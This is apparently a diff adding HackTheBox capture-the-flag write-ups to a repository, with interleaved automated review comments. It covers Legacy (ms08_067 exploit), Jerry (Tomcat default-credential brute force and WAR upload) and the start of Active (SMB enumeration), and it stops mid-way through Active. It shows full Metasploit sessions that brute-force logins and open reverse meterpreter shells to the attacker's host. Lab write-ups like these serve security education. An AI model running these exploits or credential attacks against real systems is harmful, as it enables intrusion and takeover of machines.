+ 3 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
+ 4 exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
+ 5 exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
+ 6 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
+ 7 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
+
+
+ msf5 > use exploit/windows/smb/ms08_067_netapi
+ msf5 exploit(windows/smb/ms08_067_netapi) > show options
+
+ Module options (exploit/windows/smb/ms08_067_netapi):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The SMB service port (TCP)
+ SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic Targeting
+
+
+
+The module ms08_067_netapi requires us to set the above-mentionned options : RHOSTS and RPORT.
+
+
+ msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
+ RHOSTS => 10.10.10.4
+ msf5 exploit(windows/smb/ms08_067_netapi) > run
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] 10.10.10.4:445 - Automatically detecting the target...
+ [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
+ [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
+ [*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
+ [*] Sending stage (180291 bytes) to 10.10.10.4
+ [*] Meterpreter session 2 opened (10.10.14.48:4444 -> 10.10.10.4:1032) at 2019-11-09 11:20:27 +0100
+
+ meterpreter > pwd
+ C:\WINDOWS\system32
+ meterpreter > getuid
+ Server username: NT AUTHORITY\SYSTEM
+
+
+
+the metasploit module was successful, it gave us a meterpreter shell with elevated privileges.
+
+## **Part 3 : The Root Access**
+
+All we need to do now is simply grab the user and root flags.
+
+
+ meterpreter > cd Documents\ and\ Settings
+ meterpreter > cd john
+ meterpreter > cd Desktop
+ meterpreter > cat user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ meterpreter > cd ../../..
+
+ meterpreter > cd Documents\ and\ Settings
+ meterpreter > cd Administrator
+ meterpreter > cd Desktop
+ meterpreter > cat root.txt
+ 99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
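Review bot: `Here we can see that the port 139, 445, and 3389 are opened.` contradicts the scan directly above it, which reports `3389/tcp closed ms-wbt-server`; only 139 and 445 are open. The next sentence, `We will take a closer look at the port****running the service****.`, is an unfilled template with stray bold markers and should either name the port and service (445, SMB) or be dropped. In Part 2, `The module ms08_067_netapi requires us to set the above-mentionned options : RHOSTS and RPORT` overstates it: `RPORT` already defaults to `445` and the transcript only sets `RHOSTS`, so the text should match what was typed (and `above-mentionned` should read `above-mentioned`). It would also strengthen the section to run the module's `check` before `run`, since the search output lists `Yes` in the Check column for `exploit/windows/smb/ms08_067_netapi` and the text currently asserts the host is `highly likely` vulnerable without testing it.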
diff --git a/Easy/20.md b/Easy/20.md
new file mode 100644
index 0000000..a0b4451
--- /dev/null
+++ b/Easy/20.md
@@ -0,0 +1,307 @@
+# Jerry Writeup
+
+
+
+## Introduction :
+
+Jerry is an easy Windows box that was released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sC -sV 10.10.10.95 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 08:45 CET
+ Nmap scan report for 10.10.10.95
+ Host is up (0.079s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
+ |_http-favicon: Apache Tomcat
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: Apache-Coyote/1.1
+ |_http-title: Apache Tomcat/7.0.88
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 24.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up a tomcat apache webpage. Let's fire up our metasploit console using the tomcat_mgr_login auxiliary module in order to test if the machine has been left off with default credentials.
+
+
+ msf5 > use auxiliary/scanner/http/tomcat_mgr_login
+
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
+
+ Module options (auxiliary/scanner/http/tomcat_mgr_login):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ BLANK_PASSWORDS false no Try blank passwords for all users
+ BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
+ DB_ALL_CREDS false no Try each user/password couple stored in the current database
+ DB_ALL_PASS false no Add all passwords in the current database to the list
+ DB_ALL_USERS false no Add all users in the current database to the list
+ PASSWORD no The HTTP password to specify for authentication
+ PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 8080 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
+ TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
+ THREADS 1 yes The number of concurrent threads (max one per host)
+ USERNAME no The HTTP username to specify for authentication
+ USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
+ USER_AS_PASS false no Try the username as the password for all users
+ USER_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
+ VERBOSE true yes Whether to print output for all attempts
+ VHOST no HTTP server virtual host
+
+
+Seems like we only need to set the RHOSTS parameters and the scanner should be running.
+
+
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95
+ RHOSTS => 10.10.10.95
+ msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
+
+ [!] No active DB -- Credential data will not be saved!
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
+
+ **[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret**
+
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
+
+
+The metasploit module bruteforced a few combinations and found the credentials **tomcat:s3cret**!
+
+## **Part 3 : Getting Root Access**
+
+In order to gain access to the system, we'll use the tomcat_mgr_upload metasploit module setting it's parameters with the credentials we found earlier
+
+
+ msf5 > use multi/http/tomcat_mgr_upload
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
+ HttpPassword => s3cret
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
+ HttpUsername => tomcat
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
+ RPORT => 8080
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
+ RHOSTS => 10.10.10.95
+ msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Retrieving session ID and CSRF token...
+ [*] Uploading and deploying TL8gS9C...
+ [*] Executing TL8gS9C...
+ [*] Sending stage (53928 bytes) to 10.10.10.95
+ [*] Undeploying TL8gS9C ...
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.95:49192) at 2019-11-28 08:59:45 +0100
+
+ meterpreter > sysinfo
+ Computer : JERRY
+ OS : Windows Server 2012 R2 6.3 (amd64)
+ Meterpreter : java/windows
+ meterpreter > shell
+ Process 1 created.
+ Channel 1 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ C:\apache-tomcat-7.0.88>whoami
+ whoami
+ nt authority\system
+
+
+And we're in ! the metasploit module spawned a meterpreter session as NT AUTHORITY , now all that's left to do is to find the user and root flags on the system.
+
+
+ C:\apache-tomcat-7.0.88>ls
+ ls
+
+ C:\apache-tomcat-7.0.88>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\apache-tomcat-7.0.88
+
+ 06/19/2018 03:07 AM <****DIR> .
+ 06/19/2018 03:07 AM <****DIR> ..
+ 06/19/2018 03:06 AM <****DIR> bin
+ 06/19/2018 05:47 AM <****DIR> conf
+ 06/19/2018 03:06 AM <****DIR> lib
+ 05/07/2018 01:16 PM 57,896 LICENSE
+ 11/28/2019 04:43 PM <****DIR> logs
+ 05/07/2018 01:16 PM 1,275 NOTICE
+ 05/07/2018 01:16 PM 9,600 RELEASE-NOTES
+ 05/07/2018 01:16 PM 17,454 RUNNING.txt
+ 11/28/2019 05:00 PM <****DIR> temp
+ 11/28/2019 05:00 PM <****DIR> webapps
+ 06/19/2018 03:34 AM <****DIR> work
+ 4 File(s) 86,225 bytes
+ 9 Dir(s) 27,600,842,752 bytes free
+
+ C:\apache-tomcat-7.0.88>cd ../..
+ cd ../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\
+
+ 06/19/2018 03:07 AM <****DIR> apache-tomcat-7.0.88
+ 08/22/2013 05:52 PM <****DIR> PerfLogs
+ 06/19/2018 05:42 PM <****DIR> Program Files
+ 06/19/2018 05:42 PM <****DIR> Program Files (x86)
+ 06/18/2018 10:31 PM <****DIR> Users
+ 06/19/2018 05:54 PM <****DIR> Windows
+ 0 File(s) 0 bytes
+ 6 Dir(s) 27,600,842,752 bytes free
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users
+
+ 06/18/2018 10:31 PM <****DIR> .
+ 06/18/2018 10:31 PM <****DIR> ..
+ 06/18/2018 10:31 PM <****DIR> Administrator
+ 08/22/2013 05:39 PM <****DIR> Public
+ 0 File(s) 0 bytes
+ 4 Dir(s) 27,600,842,752 bytes free
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator
+
+ 06/18/2018 10:31 PM <****DIR> .
+ 06/18/2018 10:31 PM <****DIR> ..
+ 06/19/2018 05:43 AM <****DIR> Contacts
+ 06/19/2018 06:09 AM <****DIR> Desktop
+ 06/19/2018 05:43 AM <****DIR> Documents
+ 06/19/2018 05:43 AM <****DIR> Downloads
+ 06/19/2018 05:43 AM <****DIR> Favorites
+ 06/19/2018 05:43 AM <****DIR> Links
+ 06/19/2018 05:43 AM <****DIR> Music
+ 06/19/2018 05:43 AM <****DIR> Pictures
+ 06/19/2018 05:43 AM <****DIR> Saved Games
+ 06/19/2018 05:43 AM <****DIR> Searches
+ 06/19/2018 05:43 AM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 27,600,842,752 bytes free
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator\Desktop
+
+ 06/19/2018 06:09 AM <****DIR> .
+ 06/19/2018 06:09 AM <****DIR> ..
+ 06/19/2018 06:09 AM <****DIR> flags
+ 0 File(s) 0 bytes
+ 3 Dir(s) 27,600,842,752 bytes free
+
+ dministrator\Desktop>cd flags
+ cd flags
+
+ C:\Users\Administrator\Desktop\flags>dir
+ dir | more
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator\Desktop\flags
+
+ 06/19/2018 06:09 AM <****DIR> .
+ 06/19/2018 06:09 AM <****DIR> ..
+ 06/19/2018 06:11 AM 88 2 for the price of 1.txt
+ 1 File(s) 88 bytes
+ 2 Dir(s) 27,600,842,752 bytes free
+
+
+ C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
+ more "2 for the price of 1.txt"
+ user.txt
+ 70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ root.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And thats it ! we have been able to find both the root and user flags at the same time.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
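Review bot: The Part 3 summary "spawned a meterpreter session as NT AUTHORITY" is incomplete and should read `NT AUTHORITY\SYSTEM`, which is what the `whoami` output shows; in the same sentence "it's parameters" should be "its parameters", and "tomcat apache webpage" in Part 2 should be "Apache Tomcat". In the tomcat_mgr_login run, the remark "we only need to set the RHOSTS parameters" is correct, but the reader is left to wonder why failed attempts keep scrolling after the `Login Successful: tomcat:s3cret` line; one sentence noting that STOP_ON_SUCCESS is false in the options table above would explain it. The shell transcript has several copy errors worth tidying: the `ls` on `C:\apache-tomcat-7.0.88>ls` is a no-op in cmd.exe and adds nothing, the prompt `dministrator\Desktop>cd flags` is truncated, and the prompt shows `dir` while the echoed command is `dir | more`. The `<****DIR>` tokens are escaped `<DIR>` entries from the `dir` output, which is another symptom of the transcripts not being in fenced code blocks; fencing them would also stop the `**[+] ... Login Successful ...**` bold markers from appearing literally inside the output. Finally, the conclusion would benefit from naming the root cause the writeup demonstrates: a Tomcat Manager reachable with a default credential pair, running as SYSTEM.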
diff --git a/Easy/21.md b/Easy/21.md
new file mode 100644
index 0000000..7d70f0f
--- /dev/null
+++ b/Easy/21.md
@@ -0,0 +1,510 @@
+# Active Writeup
+
+
+
+## Introduction :
+
+Active is an easy Windows box released back in July 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the **-F** flag in order to enumerate the opened ports quickly.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → nmap -F 10.10.10.100
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 10:28 CET
+ Nmap scan report for 10.10.10.100
+ Host is up (0.079s latency).
+ Not shown: 89 closed ports
+ PORT STATE SERVICE
+ 53/tcp open domain
+ 88/tcp open kerberos-sec
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 389/tcp open ldap
+ 445/tcp open microsoft-ds
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+ 49157/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
+
+
+We are going to take a closer look at the ports 53, 80, 135, 139, 389, 445, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → nmap -sC -sV -Pn 10.10.10.100 -p 53,88,135,139,389,445
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 10:29 CET
+ Nmap scan report for 10.10.10.100
+ Host is up (0.086s latency).
+
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+ | dns-nsid:
+ |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-28 09:30:01Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds?
+ Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 17s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2019-11-28T09:30:07
+ |_ start_date: 2019-11-28T09:25:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+To enumerate the SMB Shares we'll be working with, we will use the enum4linux tool.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → enum4linux 10.10.10.100
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Nov 28 10:52:05 2019
+
+ ==========================
+ | Target Information |
+ ==========================
+ Target ........... 10.10.10.100
+ RID Range ........ 500-550,1000-1050
+ Username ......... ''
+ Password ......... ''
+ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
+
+
+ ====================================================
+ | Enumerating Workgroup/Domain on 10.10.10.100 |
+ ====================================================
+ Cant load /etc/samba/smb.conf - run testparm to debug it
+ [E] Cant find workgroup/domain
+
+
+ ============================================
+ | Nbtstat Information for 10.10.10.100 |
+ ============================================
+ Cant load /etc/samba/smb.conf - run testparm to debug it
+ Looking up status of 10.10.10.100
+ No reply from 10.10.10.100
+
+ =====================================
+ | Session Check on 10.10.10.100 |
+ =====================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 437.
+ [+] Server 10.10.10.100 allows sessions using username '', password ''
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 451.
+ [+] Got domain/workgroup name:
+
+ ===========================================
+ | Getting domain SID for 10.10.10.100 |
+ ===========================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 359.
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ [+] Cant determine if host is part of domain or part of a workgroup
+
+ ======================================
+ | OS information on 10.10.10.100 |
+ ======================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 458.
+ Use of uninitialized value $os_info in concatenation (.) or string at /bin/enum4linux line 464.
+ [+] Got OS info for 10.10.10.100 from smbclient:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 467.
+ [+] Got OS info for 10.10.10.100 from srvinfo:
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+
+ =============================
+ | Users on 10.10.10.100 |
+ =============================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 866.
+ Use of uninitialized value $users in print at /bin/enum4linux line 874.
+ Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 877.
+
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 881.
+ Use of uninitialized value $users in print at /bin/enum4linux line 888.
+ Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 890.
+
+ =========================================
+ | Share Enumeration on 10.10.10.100 |
+ =========================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 640.
+ Unable to initialize messaging context
+ smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ C$ Disk Default share
+ IPC$ IPC Remote IPC
+ NETLOGON Disk Logon server share
+ Replication Disk
+ SYSVOL Disk Logon server share
+ Users Disk
+ Reconnecting with SMB1 for workgroup listing.
+ Unable to connect with SMB1 -- no workgroup available
+
+ [+] Attempting to map shares on 10.10.10.100
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/C$ Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/IPC$ Mapping: OK Listing: DENIED
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/Replication Mapping: OK, Listing: OK
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/SYSVOL Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/Users Mapping: DENIED, Listing: N/A
+
+ ====================================================
+ | Password Policy Information for 10.10.10.100 |
+ ====================================================
+ [E] Unexpected error from polenum:
+ Traceback (most recent call last):
+ File "/usr/bin/polenum", line 16, in
+ from impacket.dcerpc.v5.rpcrt import DCERPC_v5
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 501.
+ ImportError: No module named impacket.dcerpc.v5.rpcrt
+ [+] Retieved partial password policy with rpcclient:
+
+
+
+ ==============================
+ | Groups on 10.10.10.100 |
+ ==============================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.
+
+ [+] Getting builtin groups:
+
+ [+] Getting builtin group memberships:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.
+
+ [+] Getting local groups:
+
+ [+] Getting local group memberships:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 593.
+
+ [+] Getting domain groups:
+
+ [+] Getting domain group memberships:
+
+ =======================================================================
+ | Users on 10.10.10.100 via RID cycling (RIDS: 500-550,1000-1050) |
+ =======================================================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 742.
+
+ =============================================
+ | Getting printer info for 10.10.10.100 |
+ =============================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 991.
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+
+
+ enum4linux complete on Thu Nov 28 10:53:01 2019
+
+
+
+We seem to have access to the Replication Share, so we will navigate to it in order to see what we can work with.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → smbclient -N -U "" //10.10.10.100/Replication
+ Unable to initialize messaging context
+ smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ active.htb D 0 Sat Jul 21 12:37:44 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \> cd active.htb
+ smb: \active.htb\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018
+ Policies D 0 Sat Jul 21 12:37:44 2018
+ scripts D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\> cd scripts
+ smb: \active.htb\scripts\> ls
+ . D 0 Wed Jul 18 20:48:57 2018
+ .. D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\scripts\> cd ..
+ smb: \active.htb\> cd DfsPrivate
+ cd \active.htb\DfsPrivate\: NT_STATUS_OBJECT_NAME_NOT_FOUND
+ smb: \active.htb\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018
+ Policies D 0 Sat Jul 21 12:37:44 2018
+ scripts D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\> cd Policies
+ smb: \active.htb\Policies\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 12:37:44 2018
+ {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 12:37:44 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ GPT.INI A 23 Wed Jul 18 22:46:06 2018
+ Group Policy D 0 Sat Jul 21 12:37:44 2018
+ MACHINE D 0 Sat Jul 21 12:37:44 2018
+ USER D 0 Wed Jul 18 20:49:12 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
